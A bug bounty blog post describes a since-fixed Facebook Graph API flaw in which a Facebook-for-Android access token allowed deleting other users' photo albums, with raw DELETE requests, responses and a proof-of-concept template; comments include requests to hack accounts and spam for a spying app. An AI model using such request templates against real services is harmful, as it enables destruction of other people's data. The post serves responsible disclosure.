What if your photos get deleted without your knowledge?

Obviously, that’s very disgusting, isn’t it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by a user or a page or a group could be deleted.


Graph API is the primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here.
According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.
I tried to delete one of my photo albums using graph explorer access token.
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=CAACEd…..MUZD
 
Response :-
{“error”:{“message”:”(#200) Application does not have the capability to make this API call.”,”type”:”OAuthException”,”code”:200}}


Why? Because this application doesn’t have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call 😛
I decided to try it with Facebook for mobile access token because it is a top-level access token which has some extra permissions. Facebook mobile apps use the same Graph API. so took an album id & Facebook for android access token of mine and tried it.
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
 
Response:-
true
Album(518171421550249) got deleted 😀 so whats the next step? Took victim’s album id and tried to delete it. I was very curious to see the result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
 
Response:-
true
OMG 😀 the album got deleted! So what? I got access to delete all of your Facebook photos (photos which are public or the photos I could see) 😛 lol 😀
Immediately reported this bug to the Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.

Read more about getting Facebook for android access token [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
if you aren’t sure about how to do it, please see this video [How I Hacked Your Public Facebook Photos]

 

Also, read how to hack facebook account and their prevention measures

Also, read how to hack gmail account and their prevention measures

Acknowledgement of fix and rewarded me $12500 USD for reporting this vulnerability.

ack

Now, this vulnerability is completely fixed.

I thank Facebook Security Team for running bug bounty program and also for quickly fixing this issue 🙂

HALL OF FAME: https://www.facebook.com/whitehat/thanks
Topping the list 😀

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015
SHARE
  • raj

    Nice, Congo man.
    So it was your blog ah?

  • great..

  • So Great keep Hunting 🙂

  • congo man…keep it up..

  • How do you get Facebook for Android access token?

    • You can get it by intercepting Facebook mobile application requests.

    • Can anyone tell how to intercept mobile app request?or some good tutorial post on it will be helpful…

    • I think a simple MITM with Wireshark would do. Search for both and you'll find plenty of tutorials

  • Congratulations, you should have been hired by facebook

  • 100

  • Great Job Bro,Keep up the good wok 🙂

  • Scary bug but good that it got fixed

  • Can you tell me the name of the chrome plugin please? I like the background on google

  • So cool. Great find Laxman!

  • Isn't there a zero missing from the bounty amount, for such a potentially disastrous bug?

  • Can you please name the Chrome plugin for web developers?

  • nice work!

  • Awsm job.

  • Congratulations and well done.

  • can you hack an account?

  • congratulations! great job

  • Vc e bom mesmo é fazer grande trabalho

  • Vc e bom mesmo é fazer grande trabalho

  • Hi

    I am working on one project name http://www.seestatus.com this is also a social network website can we work together we need a person like you my number 07044283747

  • Great work, Keep it up.

    • Thank you Rafay Baloch 🙂 Glad to hear from you 🙂

  • Great work, Keep it up.

  • great work bro congrtas ! thanks you will great inspiration to upcoming students to find bugs and become whitehats ,

  • ¿sabes como podría verificar mi página de facebook?

  • Better call Saul!

  • Very awesome! Do you have any other tutorials or tips on how to hack. I'm new to this topic but very curious, seems fun.

    • Hopefully i ll be posting soon. Stay tuned 🙂

  • I was surprised my cover photo was mysteriously gone–from my personal profile and page. I suspected it was an error…Thanks for updating the Facebook team. #Peace

  • how did u send this bug to facebook???
    there is an option called report problem if we send any message .they are not responding …

  • Great work …Congrats …

    • Thank you 🙂

      • This is the perfect way to break down this initamrofon.

  • Great Discovery Bro, You inspire so many of us who want to do the same. Keep it up, Hope to Connect with you soon.

  • Which software did you use to intercept Facebook mobile's traffic? Fiddler or Wireshark maybe?

  • Hi! I'm an Uruguayan journalist and I'd like to ask you some questions. Can you tell me your e-mail? Thank you very much.

  • Es hora de saber quien es tú amigo hipócrita,quien habla mal de ti, si tu novio/a te es fiel, con está aplicación podrás tener vigilado el facebook de tús hijos, evitar secuestros, violaciones entre otras. Muchos ya han usado la aplicación y aseguran 100% de funcionalidad.¿Que esperáis? Sal de dudas ya.

    *PAGINA DE LA APLICACIÓN: http://donhacker.com/ *

  • Great job [email protected] it…

  • good luk

  • Awesome job bro…

    I'm very happy hearing that there are some good whitehats in India also..
    Congrats..

    Can you suggest me some great free online learning place for web development???

  • But my albums are getting deleted as soon as I post them! Please help.

  • Excellent work, I would not want to quarrel with you;) Have you received an award from Facebook?

  • Waw so simple but so nice! It's incredible… I mean, of course you're really smart and this was a great hack bu everybody could do this in few hours without a huge knowledge! That's so surprinsing!
    You also were able to delete posts and publish, Right?

  • Gajab

  • i hack bit can not delete 🙁

  • Anonymous

    Luxman which subject do you studied in college?

  • Anonymous

    How you get access token which never expires because mine is expires in one hour

  • Anonymous

    Hello , I have this error: HOST: ……………….. PORT: ……………….

  • Hello.. M in a big problem and i hope i will get solution from this site..Actually my friends facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from dat page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me.. This is a big trouble for a girl..

  • Luxman nerede şimdi

  • Hello.. Ι ΑΜ in a big problem and i hope i will get solution from this site..Actually my friend's facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from that page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me…..

  • Anonymous

    Virtually , you can use this method to delete any photo albums that belongs to a user who have registered to your facebook app , not any facebook user.

  • Nice find. Keep inspiring people. 🙂 I have one silly question, hope i will get the answer. I cannot understand how is it showing "facebook for android" with app id, in APP ID section on your access token page.
    I actually created one facebook page long back and it is showing that page app id in the access token page.

  • My photos have been deleted like this… Please help me to get them back please

  • Anonymous

    Cipto Junaedy Seminar YUK! Belajar Bisnis ala Cipto Junaedy "Pelopor Strategi Beli Property Tanpa Utang" yg dinobatkan sbg Pelayan Publik Terbaik di Bidang Bisnis.

  • Hi,

    I am new to bug bounty, can u tell me how did u intercept using burp suite, the Facebook does not allow me to use burp suite, it gives invalid certificate

  • Joey stawlen

    Laxman great job. you did pretty good job. Just FYI next time if you have to test something and find hidden or not so easily traceable bugs I would suggest to use the following tool.

    https://www.qualitestgroup.com/etl-data-warehouse-testing/

  • kasiya

    how to hack face book

    • FaRaz Khan

      Haking web jh87a a8i7d88ad

  • ibeabella

    Please help me hacked the FB account of the crab mentality people… Posting negative on me…thanks

  • FaRaz Khan

    plZ plz hake website